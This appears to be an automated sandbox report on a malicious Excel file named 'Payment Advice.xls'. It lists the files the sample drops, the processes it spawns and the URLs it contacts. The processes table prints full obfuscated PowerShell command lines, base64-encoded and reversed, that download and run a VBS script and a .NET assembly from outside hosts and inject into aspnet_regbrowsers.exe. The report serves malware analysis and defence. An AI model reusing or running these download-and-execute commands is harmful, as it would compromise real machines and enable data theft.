Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Payment Advice.xls
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 25 05:31:16 2024, Security: 1
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthingsevermeetwithgreatthingstobegood[1].hta
|
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Temp\f2dj0ncr\f2dj0ncr.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\ogisticthingswithgoodthingsgivenbes.vbS
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\Desktop\Payment Advice.xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 25 18:46:48 2024, Security: 1
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\logisticthingswithgoodthingsgivenbest[1].tiff
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C3ABE4C.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\33E4563A.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C39F1DD.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\73203679.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89D7CF3.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D63E37B7.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\1gnxtwym.xfa.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\21rgtxet.q1w.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RES19C8.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 25 17:46:39 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RES6651.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 25 17:46:59 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\a1ss3ymk.rwo.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\al22exsj\CSC903F5E3F8DB7424CB84D15F933E11EB7.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\al22exsj\al22exsj.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (349)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\al22exsj\al22exsj.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\al22exsj\al22exsj.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\al22exsj\al22exsj.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\amvnjluh.4fk.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cnbzxbrd.d10.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\f2dj0ncr\CSC6208178C473A4F0793DCFE56B934F534.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\f2dj0ncr\f2dj0ncr.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (349)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\f2dj0ncr\f2dj0ncr.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\f2dj0ncr\f2dj0ncr.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\fwlxjcj1.far.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\g5sxyqzp.igl.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\gbxy11cd.xku.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\hvufkav3.xwz.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\j342xw3p.lca.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\o101k1eb.rci.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ofnoeyj2.jb3.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ojtid1cu.x1o.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\roddab1g.w0x.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\uhqghqyp.nld.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\vnvjvi51.eel.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF01C0441D5BE0A5E1.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFBA09452E869949F1.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFE96D4E8D4C0FD3D9.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
|
data
|
dropped
|
||
|
C:\Users\user\Desktop\DA430000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 25 18:46:48 2024, Security: 1
|
dropped
|
||
|
C:\Users\user\Desktop\DA430000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 38 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SySTeM32\winDowspOWErShell\v1.0\PoweRShELl.EXe" "powErshell -ex
ByPasS -NoP -w 1
-c DEViCeCREdentialDEpLoyMEnt ;
IeX($(iex('[SystEM.TExt.EncoDING]'+[ChAr]0x3A+[char]58+'UTf8.gETSTrIng([SystEm.cOnVeRT]'+[CHar]0x3A+[ChaR]58+'FROMBasE64STRIng('+[cHar]0X22+'JFpibFZsdVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFckRlRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExIayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2FseXlhR21BWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0ksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpUkpqdVRGeUZsTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhZIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFPaGJRUSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRaYmxWbHVSdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xNDEvNDIvbG9naXN0aWN0aGluZ3N3aXRoZ29vZHRoaW5nc2dpdmVuYmVzdC50SUYiLCIkRU5WOkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIiwwLDApO3N0QVJ0LXNsZWVwKDMpO3N0QVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIg=='+[Char]0x22+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2dj0ncr\f2dj0ncr.cmdline"
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ogisticthingswithgoodthingsgivenbes.vbS"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdXaDdpbWFnZVVybCA9IHJmSWh0dHBzOi8vZHJpdmUuZ28nKydvZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9JysnMUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHJmSTtXaDd3ZWJDbGknKydlbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1doN2ltYScrJ2dlQnl0ZXMgPSBXaCcrJzcnKyd3ZWJDbGllbnQuRG93bmxvYWREYXRhKFdoN2ltYWdlVXJsKTtXaDdpbScrJ2FnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW4nKydjb2RpbmddOjpVVEY4LkdldFN0JysncmluZyhXaCcrJzdpbWFnZUJ5dGVzKTtXaDdzdGFyJysndEZsYWcgPSByZkk8PEJBU0U2NF9TVEFSVD4+cmZJO1doN2VuZEZsYWcgPSByZkk8PEJBU0U2NCcrJ19FTkQ+PnJmSTtXaDdzdGFydEluZGV4ID0gV2g3aW1hZ2VUZXh0LkluZGV4T2YoV2g3c3RhcnRGbGFnKTtXaDdlbmRJbicrJ2RleCA9IFdoN2ltYScrJ2dlVGV4dC5JbmRleE9mKFdoN2VuZEZsYScrJ2cpO1doN3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBXaDdlbmRJbmRleCAtZ3QgV2g3c3RhcnRJbmQnKydleDtXJysnaDdzdGFydEluZGV4ICs9IFdoN3N0YXJ0RmxhZy5MZW5ndGg7V2g3YmFzZTY0TGVuZ3RoID0gV2g3ZW5kSW5kZXggLSBXaDdzdGFydEluZGV4O1doN2Jhc2U2NENvbW1hbmQgPSBXaDdpbWFnZVRleHQuU3Vic3RyaW5nKFdoN3N0YXJ0SW5kZXgsIFdoN2Jhc2U2NExlbmd0aCknKyc7V2g3YmEnKydzZTY0UicrJ2V2ZXJzZWQgPSAtam9pbiAoV2g3YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJZOSBGb3JFYWNoLU9iamVjdCB7IFdoNycrJ18gfSlbLTEuLi0oV2g3YmFzZTY0Q29tbWFuZC5MZW5ndGgnKycpXTtXaDdjJysnb21tYW5kQnl0ZXMgPSBbU3lzdCcrJ2VtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFdoN2JhJysnc2U2NFJldmVyc2VkKTtXaDdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoV2g3Y29tbWFuJysnZEJ5dGVzJysnKTtXaDd2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHJmSVZBSXJmSSk7JysnV2g3dmFpTWV0aG9kLkludm9rZShXaDdudWwnKydsLCBAKHJmSXR4dC5JS0xHT0wvMjQvMTQxLjY3MS4zLicrJzI5MS8vOnB0dGhyZkknKycsIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWFzcG5ldF9yZWdicm93c2Vyc3JmSSwgcmZJZGVzYXRpdmFkb3JmSSwgcmZJZGVzYXRpdmFkb3JmSSxyZklkJysnZXNhdGl2YWRvJysncmZJLHJmJysnSWRlc2F0aXZhJysnZG9yZkkscmZJZGVzYXRpdmFkb3JmSSxyZklkZXNhdGl2YWQnKydvcmZJLHJmSWRlc2F0aXZhZCcrJ29yZkkscmZJMXJmSSxyZklkZXNhdGl2YWRvcmZJKSk7JykuUkVQTEFjRSgoW0NIYXJdODcrW0NIYXJdMTA0K1tDSGFyXTU1KSwnJCcpLlJFUExBY0UoJ3JmSScsW3N0cmluR11bQ0hhcl0zOSkuUkVQTEFjRSgoW0NIYXJdODIrW0NIYXJdODkrW0NIYXJdNTcpLFtzdHJpbkddW0NIYXJdMTI0KSB8LiAoICRWRXJCb1NFUHJlZkVyZU5DZS5Ub3NUUmluZygpWzEsM10rJ1gnLWpvSW4nJyk=';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SySTeM32\winDowspOWErShell\v1.0\PoweRShELl.EXe" "powErshell -ex
ByPasS -NoP -w 1
-c DEViCeCREdentialDEpLoyMEnt ;
IeX($(iex('[SystEM.TExt.EncoDING]'+[ChAr]0x3A+[char]58+'UTf8.gETSTrIng([SystEm.cOnVeRT]'+[CHar]0x3A+[ChaR]58+'FROMBasE64STRIng('+[cHar]0X22+'JFpibFZsdVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFckRlRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExIayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2FseXlhR21BWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0ksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpUkpqdVRGeUZsTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhZIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFPaGJRUSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRaYmxWbHVSdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xNDEvNDIvbG9naXN0aWN0aGluZ3N3aXRoZ29vZHRoaW5nc2dpdmVuYmVzdC50SUYiLCIkRU5WOkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIiwwLDApO3N0QVJ0LXNsZWVwKDMpO3N0QVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIg=='+[Char]0x22+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"('Wh7imageUrl = rfIhttps://drive.go'+'ogle.com/uc?export=download&id='+'1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur rfI;Wh7webCli'+'ent
= New-Object System.Net.WebClient;Wh7ima'+'geBytes = Wh'+'7'+'webClient.DownloadData(Wh7imageUrl);Wh7im'+'ageText = [System.Tex'+'t.En'+'coding]::UTF8.GetSt'+'ring(Wh'+'7imageBytes);Wh7star'+'tFlag
= rfI<<BASE64_START>>rfI;Wh7endFlag = rfI<<BASE64'+'_END>>rfI;Wh7startIndex = Wh7imageText.IndexOf(Wh7startFlag);Wh7endIn'+'dex
= Wh7ima'+'geText.IndexOf(Wh7endFla'+'g);Wh7startIndex -ge 0 -and Wh7endIndex -gt Wh7startInd'+'ex;W'+'h7startIndex += Wh7startFlag.Length;Wh7base64Length
= Wh7endIndex - Wh7startIndex;Wh7base64Command = Wh7imageText.Substring(Wh7startIndex, Wh7base64Length)'+';Wh7ba'+'se64R'+'eversed
= -join (Wh7base64Command.ToCharArray() RY9 ForEach-Object { Wh7'+'_ })[-1..-(Wh7base64Command.Length'+')];Wh7c'+'ommandBytes
= [Syst'+'em.Convert]::FromBase64String(Wh7ba'+'se64Reversed);Wh7loadedAssembly = [System.Reflection.Assembly]::Load(Wh7comman'+'dBytes'+');Wh7vaiMethod
= [dnlib.IO.Home].GetMethod(rfIVAIrfI);'+'Wh7vaiMethod.Invoke(Wh7nul'+'l, @(rfItxt.IKLGOL/24/141.671.3.'+'291//:ptthrfI'+',
rfIdesativadorfI, rfIdesativadorfI, rfIdesativadorfI, rfIaspnet_regbrowsersrfI, rfIdesativadorfI, rfIdesativadorfI,rfId'+'esativado'+'rfI,rf'+'Idesativa'+'dorfI,rfIdesativadorfI,rfIdesativad'+'orfI,rfIdesativad'+'orfI,rfI1rfI,rfIdesativadorfI));').REPLAcE(([CHar]87+[CHar]104+[CHar]55),'$').REPLAcE('rfI',[strinG][CHar]39).REPLAcE(([CHar]82+[CHar]89+[CHar]57),[strinG][CHar]124)
|. ( $VErBoSEPrefEreNCe.TosTRing()[1,3]+'X'-joIn'')"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\al22exsj\al22exsj.cmdline"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ogisticthingswithgoodthingsgivenbes.vbS"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdXaDdpbWFnZVVybCA9IHJmSWh0dHBzOi8vZHJpdmUuZ28nKydvZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9JysnMUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHJmSTtXaDd3ZWJDbGknKydlbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1doN2ltYScrJ2dlQnl0ZXMgPSBXaCcrJzcnKyd3ZWJDbGllbnQuRG93bmxvYWREYXRhKFdoN2ltYWdlVXJsKTtXaDdpbScrJ2FnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW4nKydjb2RpbmddOjpVVEY4LkdldFN0JysncmluZyhXaCcrJzdpbWFnZUJ5dGVzKTtXaDdzdGFyJysndEZsYWcgPSByZkk8PEJBU0U2NF9TVEFSVD4+cmZJO1doN2VuZEZsYWcgPSByZkk8PEJBU0U2NCcrJ19FTkQ+PnJmSTtXaDdzdGFydEluZGV4ID0gV2g3aW1hZ2VUZXh0LkluZGV4T2YoV2g3c3RhcnRGbGFnKTtXaDdlbmRJbicrJ2RleCA9IFdoN2ltYScrJ2dlVGV4dC5JbmRleE9mKFdoN2VuZEZsYScrJ2cpO1doN3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBXaDdlbmRJbmRleCAtZ3QgV2g3c3RhcnRJbmQnKydleDtXJysnaDdzdGFydEluZGV4ICs9IFdoN3N0YXJ0RmxhZy5MZW5ndGg7V2g3YmFzZTY0TGVuZ3RoID0gV2g3ZW5kSW5kZXggLSBXaDdzdGFydEluZGV4O1doN2Jhc2U2NENvbW1hbmQgPSBXaDdpbWFnZVRleHQuU3Vic3RyaW5nKFdoN3N0YXJ0SW5kZXgsIFdoN2Jhc2U2NExlbmd0aCknKyc7V2g3YmEnKydzZTY0UicrJ2V2ZXJzZWQgPSAtam9pbiAoV2g3YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJZOSBGb3JFYWNoLU9iamVjdCB7IFdoNycrJ18gfSlbLTEuLi0oV2g3YmFzZTY0Q29tbWFuZC5MZW5ndGgnKycpXTtXaDdjJysnb21tYW5kQnl0ZXMgPSBbU3lzdCcrJ2VtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFdoN2JhJysnc2U2NFJldmVyc2VkKTtXaDdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoV2g3Y29tbWFuJysnZEJ5dGVzJysnKTtXaDd2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHJmSVZBSXJmSSk7JysnV2g3dmFpTWV0aG9kLkludm9rZShXaDdudWwnKydsLCBAKHJmSXR4dC5JS0xHT0wvMjQvMTQxLjY3MS4zLicrJzI5MS8vOnB0dGhyZkknKycsIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWFzcG5ldF9yZWdicm93c2Vyc3JmSSwgcmZJZGVzYXRpdmFkb3JmSSwgcmZJZGVzYXRpdmFkb3JmSSxyZklkJysnZXNhdGl2YWRvJysncmZJLHJmJysnSWRlc2F0aXZhJysnZG9yZkkscmZJZGVzYXRpdmFkb3JmSSxyZklkZXNhdGl2YWQnKydvcmZJLHJmSWRlc2F0aXZhZCcrJ29yZkkscmZJMXJmSSxyZklkZXNhdGl2YWRvcmZJKSk7JykuUkVQTEFjRSgoW0NIYXJdODcrW0NIYXJdMTA0K1tDSGFyXTU1KSwnJCcpLlJFUExBY0UoJ3JmSScsW3N0cmluR11bQ0hhcl0zOSkuUkVQTEFjRSgoW0NIYXJdODIrW0NIYXJdODkrW0NIYXJdNTcpLFtzdHJpbkddW0NIYXJdMTI0KSB8LiAoICRWRXJCb1NFUHJlZkVyZU5DZS5Ub3NUUmluZygpWzEsM10rJ1gnLWpvSW4nJyk=';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"('Wh7imageUrl = rfIhttps://drive.go'+'ogle.com/uc?export=download&id='+'1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur rfI;Wh7webCli'+'ent
= New-Object System.Net.WebClient;Wh7ima'+'geBytes = Wh'+'7'+'webClient.DownloadData(Wh7imageUrl);Wh7im'+'ageText = [System.Tex'+'t.En'+'coding]::UTF8.GetSt'+'ring(Wh'+'7imageBytes);Wh7star'+'tFlag
= rfI<<BASE64_START>>rfI;Wh7endFlag = rfI<<BASE64'+'_END>>rfI;Wh7startIndex = Wh7imageText.IndexOf(Wh7startFlag);Wh7endIn'+'dex
= Wh7ima'+'geText.IndexOf(Wh7endFla'+'g);Wh7startIndex -ge 0 -and Wh7endIndex -gt Wh7startInd'+'ex;W'+'h7startIndex += Wh7startFlag.Length;Wh7base64Length
= Wh7endIndex - Wh7startIndex;Wh7base64Command = Wh7imageText.Substring(Wh7startIndex, Wh7base64Length)'+';Wh7ba'+'se64R'+'eversed
= -join (Wh7base64Command.ToCharArray() RY9 ForEach-Object { Wh7'+'_ })[-1..-(Wh7base64Command.Length'+')];Wh7c'+'ommandBytes
= [Syst'+'em.Convert]::FromBase64String(Wh7ba'+'se64Reversed);Wh7loadedAssembly = [System.Reflection.Assembly]::Load(Wh7comman'+'dBytes'+');Wh7vaiMethod
= [dnlib.IO.Home].GetMethod(rfIVAIrfI);'+'Wh7vaiMethod.Invoke(Wh7nul'+'l, @(rfItxt.IKLGOL/24/141.671.3.'+'291//:ptthrfI'+',
rfIdesativadorfI, rfIdesativadorfI, rfIdesativadorfI, rfIaspnet_regbrowsersrfI, rfIdesativadorfI, rfIdesativadorfI,rfId'+'esativado'+'rfI,rf'+'Idesativa'+'dorfI,rfIdesativadorfI,rfIdesativad'+'orfI,rfIdesativad'+'orfI,rfI1rfI,rfIdesativadorfI));').REPLAcE(([CHar]87+[CHar]104+[CHar]55),'$').REPLAcE('rfI',[strinG][CHar]39).REPLAcE(([CHar]82+[CHar]89+[CHar]57),[strinG][CHar]124)
|. ( $VErBoSEPrefEreNCe.TosTRing()[1,3]+'X'-joIn'')"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES19C8.tmp"
"c:\Users\user\AppData\Local\Temp\f2dj0ncr\CSC6208178C473A4F0793DCFE56B934F534.TMP"
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6651.tmp"
"c:\Users\user\AppData\Local\Temp\al22exsj\CSC903F5E3F8DB7424CB84D15F933E11EB7.TMP"
|
There are 8 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://drive.go
|
unknown
|
|
|
|
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.hta
|
192.3.176.141
|
|
|
|
http://94.156.177.220/logs/five/fre.php
|
